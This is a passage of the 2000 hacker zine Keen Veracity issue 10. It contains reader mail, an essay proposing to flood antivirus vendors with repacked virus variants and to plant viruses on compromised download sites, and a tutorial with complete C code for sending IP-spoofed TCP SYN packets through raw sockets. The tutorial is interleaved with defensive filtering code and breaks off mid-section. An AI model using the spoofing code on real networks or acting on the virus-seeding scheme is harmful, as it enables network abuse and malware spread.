Keen Veracity Issue 10

--------------------------------------------------------------------------------
_ _ _ _ _
| | / ) | | | | (_)_
| | / / ____ ____ ____ | | | |___ ____ ____ ____ _| |_ _ _
| |< < / _ ) _ ) _ \ \ \/ / _ )/ ___) _ |/ ___) | _) | | |
| | \ ( (/ ( (/ /| | | | \ ( (/ /| | ( ( | ( (___| | |_| |_| |
|_| \_)____)____)_| |_| \/ \____)_| \_||_|\____)_|\___)__ |
(____/
--------------------------------------------------------------------------------
I S S U E (10) L e g i o n s o f t h e U n d e r g r o u n d
-------------------------------------------------[www.legions.org]--------------


[CONTENTS]------------------------------------------------------------[CONTENTS]

[1]==============================[Editorial - Digital Ebola <digi@legions.org> ]
[2]=====================================================[KV Spam - The Readers ]
[3]===================[Theory of Denial of Service - fejed <fejed@legions.org> ]
[4]=============================[Project Sp00fed - threx <threx@attrition.org> ]
[5]=========[KV10's 30 Second Useful Script - Digital Ebola <digi@legions.org> ]
[6]=============[Booty Con 2000, Rubicon Account - sodium <sodium@omega2.net> ]
[7]====================================[Spider DoS - fejed <fejed@legions.org> ]
[8]==================================[FTP Advisory - fejed <fejed@legions.org> ]
[9]====================[Women In Technology - Godess <godess@securityflaw.com> ]
[10]===============[Expecting Mass Commands - Digital Ebola <digi@legions.org> ]
[11]=================================[NT Logging - NtWak0 <ntwako@legions.org> ]
[12]========================[UNIX Autopsies - Digital Ebola <digi@legions.org> ]
[13]========================[One Large ISP - Anonymous <anonymous@legions.org> ]
[14]=====================[Simple HTTP Security - Phriction <phric@legions.org> ]
[15]=========================[Hacker Paladins - Raschid <CogitoESum@yahoo.com> ]
[16]================[PERL Site Verification - Crater <ddfelts@ultravision.net> ]
[17]==================[Legions Survey - Gridmark/Phriction <gimps@legions.org> ]
[18]============[Guide to 0wning Your School - Gridmark <gridmark@legions.org> ]
[19]===========[OpenBSD Security Overview - David Jorm <davidj@wiretapped.net> ]
[20]=======================[Air Gapped Networks - dayzee <dayzee@madsekci.net> ]
[21]=================================[TKblink - clocker <clocker@adelphia.net> ]
[22]==================================[TCP/UDP - dayzee <dayzee@madseckzi.net> ]
[23]====================[Teleconferencing - Vixen <flutterby_2001@hotmail.com> ]
[24]==========[TCP IP Datagrams Explained - vortek <syntech@intraworldcom.net> ]
[25]=================================================[Parting Rant - The Editor]
[26]=================[The Art of Selling Out - J-P <j.p@b3ss13.ant10nl1ne.com> ]



[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
W W W . L E G I O N S . O R G
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]





[Editorial]======================================================[Digital Ebola]

Well, I have come to a revelation. After watching the billionth kiddie say
"3y3 4m 31337, j00 ph33r!", I started to do some really extensive thinking.
Where has the scene gone? I will tell you. Imagine a nice frosty bottle of
Guinness Stout. Imagine taking a drink, and it's like the most satisfying thing
on Earth. Now what happens when you finish it? You get to the bottom, and there
is this sour foam that just makes you want to puke. That sour foam resembles
the scene. Everyone in the tasty part of the bottle has gotten good jobs,
grown up, or left. What is left is the kiddies. The sour foam. Sometimes we may
find that some of the tasty part ends up on the bottom too. Do not drink this.

As you read this, you are telling yourself that digi is on crack, he has lost
his mind. Maybe I have, but the philosopher part of me has taken over, and now
I have to urge you, the competent reader, to savor the beer. Drink the beer,
and when you come to the sour foam, toss the bottle in the trash and
go to the fridge and get another. Do not let the sour foam prevent you from
what you do best. Do not let the sour foam drag you down.

Now that I have ranted, I now give you Keen Veracity 10.


[KV Spam]==========================================================[The Readers]

Date: Mon, 14 Aug 2000 02:42:34 -0700
From: Mercury <fortress@tir.com>
To: digi@legions.org
Subject: wintermute bbs

Hi there. I remember logging into your Wintermute BBS a while back and
I'm looking to set up a BBS now. I was wondering what software you used
for that BBS, or if you know of any good unix BBS software.


Thanks

Mercury

/* Yah, the BBS is quite dead. I haven't decided whether to build it back.
If you are looking to set one up, I recommend Daydream for Linux. It seems
to be the most flexible, and is quick to set up. Plan on spending a lot of time
with it still yet, as once started, the BBS is never quite finished.. =)
*/


Date: Thu, 17 Aug 2000 21:41:44 -0400
From: Robert Thomas <pjspotter98@earthlink.net>
To: digi@legions.org
Subject: HELP

----------------------------------------

I NEED A HACKERS HELP, WILL PAY
THANKS

/* Money doesn't buy you everything... */

Date: Tue, 22 Aug 2000 19:51:27 EDT
From: Kawaboy7@aol.com
To: digi@legions.org
Subject: i think your site is great

I need help can you send me Roxy surfr 150 emails
she is my EX- g/f and I want to hear about her new b/f

/* Really now, is the bitch worth going to jail over? */

Date: Thu, 24 Aug 2000 05:49:45 GMT
From: nobody user <hackirc2000@hotmail.com>
To: digi@legions.org
Subject: Question

Hello,

I was interested in finding out how to hack an IRC server, so you could
add your own O:lines and so forth. I haven't been able to find any
information on this. The only thing I could find was getting ChanOps in a
channel when a split happens, which doesn't work anymore. I read Keen
Veracity, that is how I found your e-mail address. Could you maybe give me
any pointers, or tell me if it could be done. I appreciate your time.

Thanks,
HACKIRC

/* OK. The only thing you can do to learn about how IRC servers work is to
install one yourself. This means you should be setting up a UNIX machine of
some type; Linux would probably be best for you if you are not familiar with
these types of operating systems. Once you have gotten that far, you should
go to www.freshmeat.net and search for an IRC server. There are several;
Hybrid and Bahamut are a couple that come to mind. Most of these are pretty much
the same as far as layout. O:lines and such are kept in a file called ircd.conf.
Read the docs, set up your server and get familiar with it.
*/


Date: Sun, 27 Aug 2000 17:43:35 +0100 (BST)
From: "[iso-8859-1] rakesh sud" <rsud123@yahoo.co.in>
To: digiebola@hackphreak.org
Subject: Hacking rsud@vsnl.com

Hello Guys,
I have been for a month, trying to hack into an email
account. I have previously broken into hotmail
accounts without that much difficulty. I send the guys
their passwords after that. It feels good. One bloke
challenged me and said it is impossible to hack into
email accounts from india's isp vsnl. I took up the
challenge but couldn't pull it off.
Starting to believe now that the guy who can do so has
to be.....'A GENIUS'. Well I now forward the challenge
to you blokes. If any of you can hack into the
email ' rsud@vsnl.com ', I will believe that you are
'the king'. But 'the king' is if you are the first to
hack it and let me know. 'The King' will then be my
guru and...i can do a lot of things for my guru. To
start off with, I would register a domain name (costing
$35) for you, for free ( Only to the first person). Do
send the password to my email. Best of luck all.
with love,
Joseph.
( The email to be hacked is rsud@vsnl.com ).

____________________________________________________________
Do You Yahoo!?
Get your free @yahoo.co.in address at http://mail.yahoo.co.in

/* If a kiddie is shot in the woods, does he make a sound? */

Date: Sun, 20 Aug 2000 19:42:42 -0900
From: Van Mortel <teckforce@lycos.com>
To: digiebola@hackphreak.org
Subject: Hacker

Hi,

I'm a newbie in the domain of hacking and I want to know how to enter a server
or how I can hack.

Thank You

TeckForce

/* Find a search engine or read stuff like KV. */

Date: Mon, 14 Aug 2000 03:47:06 -0700 (PDT)
From: "[iso-8859-1] thecno trance" <thecnojetaime@yahoo.com>
To: digiebola@hackphreak.org
Subject: help need

need to hack a web page, where can i get the toolz?
Please answer, you'll get recompensation....

__________________________________________________
Do You Yahoo!?
Yahoo! Mail - Free email you can access from anywhere!
http://mail.yahoo.com/

/* www.jackinworld.com is a good place to start... */

Date: Sat, 12 Aug 2000 16:20:36 -0400
From: Freaksta <freaxter8@home.com>
To: digiebola@hackphreak.org
Subject: Can i be lame like you too?

How can i go about copyrighting all my friends' ideas and then selling them
back to them for 30k?!

/* well, first I suggest you get some friends... */


[Theory of Denial of Service]================================[fejed@legions.org]

I'm writing on the topic of denial of service here... no, not ./winnuke or
anything like that, but a rather deeper, more thought-out possibility.
Ok, we all know what virus scanners do, don't we? Ok... I'm sure a few
people that read this will have no clue (the next paragraph is just for you
people with no clue out there).

Ok, here's the deal: virus scanners search through binaries, or as an
option every file that is accessible to the scanner, looking for a
specific signature that is present in every duplicate of the virus, which they
keep in a database that comes with the virus scanner. Some anti-virus software
also scans for signatures of programs that are often misused, say hack.exe,
and tells the clueless user that it's a virus, so he/she that downloaded his
31337 hack.exe thinks it's a virus and deletes the file. Trojans are put under
the title of virii/viruses also, which I personally think is incorrectly
using the term, but anyway, enough of that, let's get to the core of the
situation.

Ok, let's say Bob downloads the source of every known virus that exists
(x86 specific) that he can get his hands on, even all the early ones, like
Junkie and AIDS, then compiles and links them with the same linker
to make stuph simpler for himself. He then obtains a compression program, or
uses his elite hacker skills and codes one himself, that generates
different signatures for binaries on the fly, a different signature every
time it is run; then he binds the compressed virii with their different
signatures to different programs.

Bob can now:

1. Penetrate a major software company's site (or something else large)
and use their software to bind his duplicated virii to, say, a download
site. Or he could penetrate Windows warez boxen, bind one virus to each,
then let it spread.

2. Ok, he's got all of his virii all spiffy with their new signatures, ready to
go, so Bob has his 20,000 or so virii; what's he going to do with all of them?
Well, he's going to submit them to anti-virus companies, such as
Anti-Viral-Pro (AVP) www.avp.com "Virus Protection for the Real World."

Ok, if you chose number one, then I wish you luck; don't email me asking
'How do I hack?', anything of that matter will most likely be ignored.
If you chose number 2, then you keep making new strands of old virii and
re-submitting them to companies. If we repeat the procedure quite a bit,
then we'll be creating a slight denial of service against everyone that
downloads an anti-virus program, because they'll be downloading around
200-400k more, at the least. If you continue with the attack of new
virii, and many others do, then we'll be getting into the area of a couple more
megs, and if we keep going we may eventually reach a gig. Also, having a larger
database of signatures would mean more CPU cycles needed to scan at the same
speed, and more space to store the signatures; or again, if the signatures
were stored remotely, then we'd be using more and more bandwidth for each
scan we do, which will ultimately take more time. With all these factors
being as such (technology advances with time, but the user does not advance
as fast, so the technology isn't as widely used), we have a slower
process in most areas. Such is Denial of Service.

One more update to this text (this is the 3rd addition to it).
Whilst watching the news on various free-to-air television channels,
reading my email, watching people talk about it, and reading headlines on
various websites, I'm laughing to myself, quietly. I see how people talk
so ignorantly and bluntly about such things as if they know what they are
talking about, and they do it without even realising, so bluntly, without
being specific at all: "Love Bug", just another virus, in another day.
If so many ignorant people stopped using operating systems with such control
over the hardware they are connected to, then there would be less of a
problem, *cough* Microsoft Windows *cough*, *cough* Microsoft DOS *cough*.
This article proves that there is sufficient power to bring all x86
Windows95/98 and MS-DOS based operating systems and such to their knees,
because if what I speak of was put into effect then scanning for simple
viruses would be an enormous task, which may even prove impossible, due to
the sheer size of the database plus the time needed to scan for the offending
viruses. If such a thing was done, then I'm sure people would be pushed to
use operating systems based on unix, such as linux, or if not that, be
so afraid that they would not even dare turn their computers on, for
fear of the inevitable.


Greets to all who know me.

[Project Sp00fed]==========================================[threx@attrition.org]



%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% Title: Project Sp00fed %
% Author: Threx <threx@attrition.org> %
% Date: 7/16/00 %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

- Table of Contents -
1.0 Intro

2.0 IPv4
2.1 IPv4 Packets Layout
2.2 The Header Fields

3.0 TCP
3.1 TCP Datagram Layout
3.2 The Header Fields
3.3 Explained Code
3.4 tcpsp00f.c

4.0 UDP
4.1 UDP Datagram Layout
4.2 The Header Fields
4.3 Code
4.4 udpsp00f.c

5.0 ICMP
5.1 Echo Reply Message Layout
5.2 The Fields
5.3 icmpsp00f.c

6.0 Reference


1.0 Intro
^^^^^^^^^
Well, it's 6:45pm on Sunday and I guess I will start writing my article for
Keen Veracity 10 :). I have learned a lot about how to code spoofed
TCP/UDP/ICMP packets in the past month or so. So I've decided
to write my article on, you've guessed it, coding spoofed packets.

Before reading this article you should already have an understanding of C
socket programming and TCP/IP.

(NOTE: There might be misspelled words here and there... well, I guess
you're gonna have to live with it :P.)

2.0 IPv4
^^^^^^^^
IPv4, also known as Internet Protocol version 4, is the most widely used
IP version out there on the net for now. Soon IPv6 will be the
leading IP version, but that is a whole other article for a
different time. Be glad we are using IPv4. Why? Because it is so
easy to spoof :).

2.1 IPv4 Packet Layout
^^^^^^^^^^^^^^^^^^^^^^

-----------------------------------------------
| version | header | type of | length |
| | length | service | |
|-----------------------------------------------|
| identification | flags | fragment |
| | | offset |
|-----------------------------------------------|
| time to live | protocol | header checksum |
|-----------------------------------------------|
| source ip address |
|-----------------------------------------------|
| destination ip address |
|-----------------------------------------------|
| options |
|-----------------------------------------------|
| data |
-----------------------------------------------

2.2 The Header Fields
^^^^^^^^^^^^^^^^^^^^^
The IP header is used to determine what will happen to the packet. It
consists of 12 fields:

# version = The IP version number. This will usually be 4 because it is
the most widely used. Soon it will be 6, the next generation of the
internet. I highly recommend reading some info on the topic.

# header length = This is the total length of the IP header. This also
includes the option field.

# type of service = This indicates what type of handling this packet gets.
The first 3 bits stand for routing priority, the next 4 bits stand for
the type of service.

# length = This is the total length of the IP header, and TCP header, UDP
header, or ICMP header.

# identification = This is a specific value that is used for
fragmentation. If you are sending made up packets randomly then regard
this.

# flags & offset = These fields are used to reassemble packets when it
reaches the destination host.

# time to live = This is simply the time limit the packet has to live.
Each time it passes through a router, one is subtracted until it
reaches 0, and then the packet is discarded. (NOTE: depending on what kind
of packet you are sending, icmp, tcp, udp, this might need to be a
specific value.)

# protocol = This is the type of protocol (ex. TCP, UDP) that will be
sent. Some common protocol numbers are:

`Taken from /etc/protocols'
ip 0 IP # internet protocol, pseudo protocol number
icmp 1 ICMP # internet control message protocol
igmp 2 IGMP # internet group multicast protocol
ggp 3 GGP # gateway-gateway protocol
tcp 6 TCP # transmission control protocol
pup 12 PUP # PARC universal packet protocol
udp 17 UDP # user datagram protocol
idp 22 IDP # WhatsThis?
raw 255 RAW # RAW IP interface

# header checksum = This checksum covers the IP header only; the code
below leaves it set to 0.

# source ip address = This is a 32 bit field containing the source
address.

# destination ip address = This is a 32 bit field containing the
destination address.

# options = This field is optional. These are additional options to the
IP header.

# data = This is another optional field. Here is where you put the
payload to be sent with the IP header.

3.0 TCP
^^^^^^^
Transmission Control Protocol, TCP, is probably the most widely used
protocol out there. But with popularity come problems. TCP is, I believe,
the hardest protocol type to spoof. But again, it all depends on
what you want to do. If you want to make a SYN flooder then it is very
easy. However, if you want to make a full TCP connection then you have to
know the specific sequence number of the host you are trying to imitate.

3.1 TCP Datagram Layout
^^^^^^^^^^^^^^^^^^^^^^^

-----------------------------------------------
| source port | destination port |
|-----------------------------------------------|
| sequence number |
|-----------------------------------------------|
| acknowledgment number |
|-----------------------------------------------|
| header information | window size |
|-----------------------------------------------|
| tcp checksum | urgent pointer |
|-----------------------------------------------|
| options (optional field) |
| |
| |
| |
| |
| data (optional field) |
| |
-----------------------------------------------


3.2 The Header Fields
^^^^^^^^^^^^^^^^^^^^^
The TCP datagram is used to send a TCP packet (duh). It consists of 8
fields.

# source port = A value indicating the port number the packet is
coming from.

# destination port = A field indicating the port number the
packet is being sent to.

# sequence number = A field keeping the TCP segments in order.
This is the reason why it is so hard to spoof a whole TCP connection.
This value has to be perfect in order to send data and such. In other
words you need to complete a 3-way handshake.

# acknowledgment number = A field holding the value the sender expects to
receive. It is derived from the previous sequence number sent out.

# header information = A field with one of the following flags.
URG flag = URGENT. This will be routed faster.
ACK flag = An acknowledgment is sent.
PSH flag = The data will be pushed through immediately.
RST flag = Reset the connection.
SYN flag = Synchronize sequence numbers.
FIN flag = This is the final data sent from the sender.

# window size = A field specifying the number of bytes that can be
sent before an acknowledgment (ACK) is expected.

# tcp checksum = A TCP checksum over the header and the payload, if any.

# urgent pointer = A pointer that is only used when the urgent flag
(URG) is set. It points to the last byte of the data sent with
priority.

# options = This field is optional. It is mostly used if you want to add
more parameters.

# data = This field is optional. If any payload is added, this is where it
will go.
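The following is an added example by the editor, not code from Threx's article,
showing the other side of 3.2: what a host or border router does with a TCP
segment before the three-way handshake is even considered. It parses the IPv4
and TCP headers out of a byte buffer, decodes the flag bits, and drops segments
whose source address could never have arrived from the outside (limited
broadcast, 0/8, loopback, multicast). That is the ingress-filtering idea of
RFC 2827 (BCP 38), and it is exactly what stops a segment forged with the
255.255.255.255 source used in the code later in this article. The three sample
packets, the verdict names and the martian list are constructed for the
example; a real filter also checks the checksums and knows its own prefixes.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define TCP_FIN 0x01
#define TCP_SYN 0x02
#define TCP_RST 0x04
#define TCP_PSH 0x08
#define TCP_ACK 0x10
#define TCP_URG 0x20

enum verdict { ACCEPT = 0, DROP_MALFORMED, DROP_NOT_TCP, DROP_MARTIAN_SRC, DROP_BAD_FLAGS };

#define SAMPLE_LEN 40  /* 20-byte IPv4 header + 20-byte TCP header, no options, no data */

/* Constructed sample: the article's values (id 1234, ttl 250, 1111 -> 25, window 4343)
   with source 255.255.255.255 and destination 127.0.0.1. Checksums stay 0; this
   filter never looks at them, it decides on addresses and flags alone. */
const uint8_t kSpoofedSyn[SAMPLE_LEN] = {
    0x45,0x00,0x00,0x28, 0x04,0xd2,0x00,0x00, 0xfa,0x06,0x00,0x00, 0xff,0xff,0xff,0xff, 0x7f,0x00,0x00,0x01,
    0x04,0x57,0x00,0x19, 0x00,0x00,0x00,0x01, 0x00,0x00,0x00,0x00, 0x50,0x02,0x10,0xf7, 0x00,0x00,0x00,0x00 };
/* The same SYN from a normal source, 10.0.0.1 -> 10.0.0.2. */
const uint8_t kLegitSyn[SAMPLE_LEN] = {
    0x45,0x00,0x00,0x28, 0x04,0xd2,0x00,0x00, 0xfa,0x06,0x00,0x00, 0x0a,0x00,0x00,0x01, 0x0a,0x00,0x00,0x02,
    0x04,0x57,0x00,0x19, 0x00,0x00,0x00,0x01, 0x00,0x00,0x00,0x00, 0x50,0x02,0x10,0xf7, 0x00,0x00,0x00,0x00 };
/* Same addresses, but SYN and FIN set together, which no real stack sends. */
const uint8_t kSynFin[SAMPLE_LEN] = {
    0x45,0x00,0x00,0x28, 0x04,0xd2,0x00,0x00, 0xfa,0x06,0x00,0x00, 0x0a,0x00,0x00,0x01, 0x0a,0x00,0x00,0x02,
    0x04,0x57,0x00,0x19, 0x00,0x00,0x00,0x01, 0x00,0x00,0x00,0x00, 0x50,0x03,0x10,0xf7, 0x00,0x00,0x00,0x00 };

/* Source addresses that cannot belong to a host on the far side of a link:
   limited broadcast, "this network", loopback and multicast. */
int ipv4_source_is_martian(uint32_t src)   /* host byte order */
{
    if (src == 0xffffffffu) return 1;      /* 255.255.255.255 */
    if ((src >> 24) == 0)   return 1;      /* 0.0.0.0/8 */
    if ((src >> 24) == 127) return 1;      /* 127.0.0.0/8 */
    if ((src >> 28) == 0xe) return 1;      /* 224.0.0.0/4 */
    return 0;
}

/* The flag byte is offset 13 of the TCP header (the article's "header information"). */
uint8_t tcp_flags(const uint8_t *tcp) { return tcp[13]; }

/* No flags at all, or SYN together with FIN or RST, never occurs in a legitimate segment. */
int tcp_flags_illegal(uint8_t f)
{
    if (f == 0) return 1;
    if ((f & TCP_SYN) && (f & (TCP_FIN | TCP_RST))) return 1;
    return 0;
}

/* Render the set flags as "SYN,ACK" style text for a log line. */
const char *tcp_flag_names(uint8_t f, char *out, size_t cap)
{
    static const char *names[6] = { "FIN", "SYN", "RST", "PSH", "ACK", "URG" };
    size_t used = 0;
    out[0] = '\0';
    for (int i = 0; i < 6; i++) {
        if (!(f & (1u << i))) continue;
        int n = snprintf(out + used, cap - used, "%s%s", used ? "," : "", names[i]);
        if (n < 0 || (size_t)n >= cap - used) break;
        used += (size_t)n;
    }
    return out;
}

/* Walk the IPv4 header to the TCP header and decide what an ingress filter would do. */
int tcp_segment_verdict(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4) return DROP_MALFORMED;
    size_t ihl = (pkt[0] & 0x0f) * 4;                /* IP header length in bytes */
    if (ihl < 20 || len < ihl + 20) return DROP_MALFORMED;
    if (pkt[9] != 6) return DROP_NOT_TCP;            /* protocol field */
    uint32_t src = (uint32_t)pkt[12] << 24 | (uint32_t)pkt[13] << 16 |
                   (uint32_t)pkt[14] << 8  | pkt[15];
    if (ipv4_source_is_martian(src)) return DROP_MARTIAN_SRC;
    const uint8_t *tcp = pkt + ihl;
    size_t doff = (tcp[12] >> 4) * 4;                /* data offset, 32-bit words like ihl */
    if (doff < 20 || len < ihl + doff) return DROP_MALFORMED;
    if (tcp_flags_illegal(tcp_flags(tcp))) return DROP_BAD_FLAGS;
    return ACCEPT;
}

int main(void)
{
    char names[32];
    printf("spoofed SYN: verdict %d, flags %s\n", tcp_segment_verdict(kSpoofedSyn, SAMPLE_LEN),
           tcp_flag_names(tcp_flags(kSpoofedSyn + 20), names, sizeof names));
    printf("legit SYN:   verdict %d\n", tcp_segment_verdict(kLegitSyn, SAMPLE_LEN));
    printf("SYN+FIN:     verdict %d\n", tcp_segment_verdict(kSynFin, SAMPLE_LEN));
    return 0;
}
```

Save it as, say, tcpfilter.c and build with gcc -o tcpfilter tcpfilter.c. The forged
SYN comes back as DROP_MARTIAN_SRC (3), the plain SYN as ACCEPT (0) and the SYN+FIN
as DROP_BAD_FLAGS (4); nothing here needs a raw socket or root.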

3.3 Code
^^^^^^^^
Well, finally here is the code. Now let us analyze this shit a little bit.

Here are the header files needed in order to spoof packets. We don't use
netinet/ip.h or netinet/tcp.h in this code. Those header files would make
it a lot more portable; however, it's more work. So I've decided to use
linux/ip.h and linux/tcp.h. This limits the code to the Linux
operating system. But that's what I use mostly, so tough luck if
you don't.

===[ snip ]============================================
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <linux/ip.h>
#include <linux/tcp.h>
===[ unsnip ]==========================================

Here I have defined some shit... It's just a lot easier this way :). Here I
define the source ip, the address the packet claims to come from, and the
destination ip, the address the packet is being sent to. I also
define the source port and the destination port. Here the packet is
coming from port 1111 and being sent to port 25, smtp.

===[ snip ]============================================
#define error -1
#define srcip "255.255.255.255"
#define dstip "127.0.0.1"
#define sport 1111
#define dport 25
===[ unsnip ]==========================================

It all comes together here. We declare a pointer to the ip header struct
from linux/ip.h, and the same for the tcp header. Then we declare the packet,
which is simply a buffer the size of the ip and tcp headers together.
Now we declare the target, the destination address. Then, to be able to
put the source ip and destination ip in the ip header, we declare saddr and
daddr.
We then declare sock and on. 'sock' is the socket we open and set options
on; 'on' is the value used for setting socket options.

===[ snip ]============================================
int main(void) {
struct iphdr *iphdr;
struct tcphdr *tcp;
u_char packet[sizeof(struct iphdr) + sizeof(struct tcphdr)];
struct sockaddr_in target;
struct in_addr saddr, daddr;
int sock, on = 1;
===[ unsnip ]==========================================

Here we open a socket. We have to provide a domain, which is AF_INET, the
type of socket, which is a raw socket, and the protocol, which is
the raw IP protocol. We also have error checking. You should always have it;
it's very useful.

===[ snip ]============================================
if ((sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == error) {
printf("socket error\n");
exit(1);
}
===[ unsnip ]==========================================

Now we set the socket options with setsockopt. We use the option IP_HDRINCL,
which allows us to supply our own ip header. If you don't have this option
on your system then you can't spoof packets :(.

===[ snip ]============================================
if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on)) == error) {
printf("setsockopt error\n");
exit(1);
}
===[ unsnip ]==========================================

Here we just point the ip and tcp header structures at the packet buffer.
Then we zero them out.

===[ snip ]============================================
iphdr = (struct iphdr *)packet;
tcp = (struct tcphdr *)(packet + sizeof(struct iphdr));
memset((char *)iphdr,'\0',sizeof(struct iphdr));
memset((char *)tcp,'\0',sizeof(struct tcphdr));
===[ unsnip ]==========================================

Now we set saddr.s_addr to the srcip defined earlier in the
code, and do the same for the destination ip address.

===[ snip ]============================================
saddr.s_addr = inet_addr(srcip);
daddr.s_addr = inet_addr(dstip);
===[ unsnip ]==========================================

Finally we get to the good part, building the packet. This is mostly
self-explanatory; look at 3.2 The Header Fields for an explanation.

===[ snip ]============================================
iphdr->ihl = 5;
iphdr->version = 4;
iphdr->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iphdr->id = 1234;
iphdr->ttl = 250;
iphdr->protocol = 6;
iphdr->saddr = saddr.s_addr;
iphdr->daddr = daddr.s_addr;
iphdr->check = 0;
tcp->source = htons(sport);
tcp->dest = htons(dport);
tcp->seq = htonl(rand());
tcp->ack_seq = htonl(rand());
tcp->res1 = 0;
tcp->doff = 5;
tcp->window = htons(4343);
tcp->syn = 1;
===[ unsnip ]==========================================

First we zero out our target. Then we fill in its sin family, port, and
address.

===[ snip ]============================================
memset(&target,'\0',sizeof(target));
target.sin_family = AF_INET;
target.sin_port = htons(dport);
target.sin_addr = daddr;
===[ unsnip ]==========================================

Now we finally get to send the packet. So we simply use the sendto()
function to send it out.

===[ snip ]============================================
printf("sending packet: ");
if (sendto(sock,&packet,sizeof(packet),0x0,(struct sockaddr *)&target,
sizeof(target)) != sizeof(packet)) {
printf("packet wasn't sent\n");
exit(1);
}
else {
printf("packet sent\n");
}
exit(0);
}
===[ unsnip ]==========================================

3.4 tcpsp00f.c
^^^^^^^^^^^^^^
===[ cut here ]===============================================
/* tcpsp00f.c for "Project Sp00fed" by Threx <threx@attrition.org> */
/* compile: gcc -o tcpsp00f tcpsp00f.c */
/* this code will send a spoofed packet to port 25(smtp) to 127.0.0.1 */
/* host. */
/* needed header files */
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <linux/ip.h> /* instead of using netinet/ip.h we use linux/ip.h */
#include <linux/tcp.h> /* so this will only work on linux */



/* define the constants */
#define error -1
#define srcip "255.255.255.255" /* source address */
#define dstip "127.0.0.1" /* destination address */
#define sport 1111 /* source port */
#define dport 25 /* destination port(smtp) */


int main(void) {
struct iphdr *iphdr;
struct tcphdr *tcp;
u_char packet[sizeof(struct iphdr) + sizeof(struct tcphdr)];
struct sockaddr_in target;
struct in_addr saddr, daddr;
int sock, on = 1;

if ((sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == error) {
printf("socket error\n");
exit(1);
}

if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on)) == error) {
printf("setsockopt error\n");
exit(1);
}

iphdr = (struct iphdr *)packet;
tcp = (struct tcphdr *)(packet + sizeof(struct iphdr));
memset((char *)iphdr,'\0',sizeof(struct iphdr));
memset((char *)tcp,'\0',sizeof(struct tcphdr));

saddr.s_addr = inet_addr(srcip);
daddr.s_addr = inet_addr(dstip);

/* let's build a packet */
iphdr->ihl = 5;
iphdr->version = 4; /* this will always be 4 */
iphdr->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iphdr->id = 1234;
iphdr->ttl = 250; /* a length of time the packet will survive */
iphdr->protocol = 6;
iphdr->saddr = saddr.s_addr; /* source address */
iphdr->daddr = daddr.s_addr; /* destination address */
iphdr->check = 0;
tcp->source = htons(sport); /* source port */
tcp->dest = htons(dport); /* destination port */
tcp->seq = htonl(rand());
tcp->ack_seq = htonl(rand());
tcp->res1 = 0;
tcp->doff = 5;
tcp->window = htons(4343); /* window size */
tcp->syn = 1; /* let's send a syn flag */

memset(&target,'\0',sizeof(target));
target.sin_family = AF_INET;
target.sin_port = htons(dport);
target.sin_addr = daddr;


/* now let's send this packet */
printf("sending packet: ");
if (sendto(sock,&packet,sizeof(packet),0x0,(struct sockaddr *)&target,
sizeof(target)) != sizeof(packet)) {
printf("packet wasn't sent\n");
exit(1);
}
else {
printf("packet sent\n");
}
exit(0);
}
===[ done ]===================================================

4.0 UDP
^^^^^^^
UDP, also known as User Datagram Protocol, is a connectionless protocol.
This is great if you want to spoof UDP packets, because it doesn't make
a complete connection to the host; it just sends out the packets.
However, it is unreliable :(.

4.1 UDP Datagram Layout
^^^^^^^^^^^^^^^^^^^^^^^

--------------------------------------
| source port | destination port |
|--------------------------------------|
| length | checksum |
|--------------------------------------|
| data |
--------------------------------------

4.2 The Header Fields
^^^^^^^^^^^^^^^^^^^^^
Here are the 5 header fields that need to be filled in order
to send a UDP packet and also spoof it.

# source port = This field is optional, but fun to play with. This
field is the port the information is coming from.

# destination port = This field tells what port you are sending the UDP
packet to.

# length = The field specifying the number of bytes in the UDP datagram.

# checksum = Just a checksum for the UDP header.

# data = This is the data that will be sent to a UDP port.
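Added example, again the editor's and not from the article: the checksum and
length rules that 2.2 and 4.2 mention only in passing, worked through in C so
you can see what a receiving stack actually verifies. ip_header_checksum() is
the RFC 1071 one's-complement sum over the IP header, the value a sender fills
into the field the article leaves at 0. udp_compute_checksum() covers the
pseudo-header (source and destination address, a zero byte, protocol 17 and the
UDP length), then the UDP header and data, so it is more than "a checksum for
the UDP header". udp_datagram_check() is the receiver-side validation: it
rejects a packet whose IP checksum is wrong, whose UDP length field is not the
IP total length minus the IP header, or whose non-zero UDP checksum fails. The
sample datagrams are constructed (10.0.0.1:1111 -> 10.0.0.2:137, payload
"ping"); the second carries the UDP length you get by counting the IP header
into it, and shows why such a datagram is discarded.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

enum udp_status { UDP_OK = 0, ERR_SHORT, ERR_IP_VERSION, ERR_IP_LEN,
                  ERR_IP_CSUM, ERR_NOT_UDP, ERR_UDP_LEN, ERR_UDP_CSUM };

/* Constructed sample: 10.0.0.1:1111 -> 10.0.0.2:137, payload "ping", both checksums correct. */
const uint8_t kUdpGood[32] = {
    0x45,0x00,0x00,0x20, 0x04,0xd2,0x00,0x00, 0xfa,0x11,0xa7,0xf8, 0x0a,0x00,0x00,0x01, 0x0a,0x00,0x00,0x02,
    0x04,0x57,0x00,0x89, 0x00,0x0c,0x08,0x23, 'p','i','n','g' };
/* Same datagram, but the UDP length counts the IP header too (32) and the checksum is 0. */
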